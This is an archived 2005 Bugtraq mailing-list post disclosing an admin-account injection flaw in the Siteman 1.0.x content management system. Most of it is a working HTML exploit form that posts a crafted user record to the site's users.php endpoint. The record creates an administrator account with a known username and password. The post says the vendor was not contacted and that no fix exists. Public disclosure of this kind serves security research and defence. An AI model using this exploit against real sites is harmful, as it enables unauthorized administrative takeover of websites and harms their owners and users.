| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 20 Jan 2005 21:56:33 -0000 From: Pedram hayati <pi3ch@...oo.com> To: bugtraq@...urityfocus.com Subject: God Admin Injection Vulnerability in Siteman 1.0.x God Admin Injection Vulnerability in Siteman 1.0.x, Discovered by PersianHacker.NET Security Team by amironline452 (amironline452 hotmail com) http://www.PersianHacker.NET http://www.amironline452.tk Siteman is a Content Management System (CMS) that is so easy to install and use, that a person who has no knowledge about creating homepages can get a profesionally looking website up and running in just minutes. More info @ http://sitem.sourceforge.net/ http://sourceforge.net/projects/sitem/ Discussion: With this Vulnerability you can create God Admin user in Siteman v1.0.x. Exploiet: <html> <b>These data were recorded.</b><br /><br /><table cellspacing="0" cellpadding="2"><tr><td>Username(Use this, and not your display name, when logging in)</td><td align="right">amir452</td></tr><tr><td>Password</td><td align="right"><form><select><option>Click to show password</option> <option>amir452</option></select></form></td></tr><tr><td>Secret Question (Asked when you forget your password)</td><td align="right">amir452</td></tr><tr><td>Answer to secret question</td><td align="right"><form> <select> <option>Click to show answer</option> <option>amir452</option> </select></form> </td></tr><tr><td>Display name</td><td align="right">amir452</td></tr><tr><td>Member Level</td><td align="right"><b>5</b> (Admin)</td></tr><tr><td>email</td><td align="right">amir452@...r452.com</td></tr><tr><td>Hide my email adress</td><td align="right">no</td></tr><tr><td>Forum Signature</td><td align="right">hackers</td></table><br /><br />Is this correct?<br /><table cellspacing="0" cellpadding="3"><tr><td> <form action="users.php?do=new" method="post"><input type="submit" value="no" /></form></td><td> <form action="http://www.example.com/users.php?do=docreate" method="post"> <input type="hidden" name="line" value="amir452|347a9a8a8d3f364f0bdb82c4208a3207|5|amir452@...r452.com|amir452|1105956827|amir452|347a9a8a8d3f364f0bdb82c4208a3207|0|0|0|hackers" /><input type="submit" value="yes" /></form></html> the above exploiet creat God Admin user with folowing info: username: amir452 password: amir452 Note: Script authors not contacted. There is no solution at this time.
Powered by blists - more mailing lists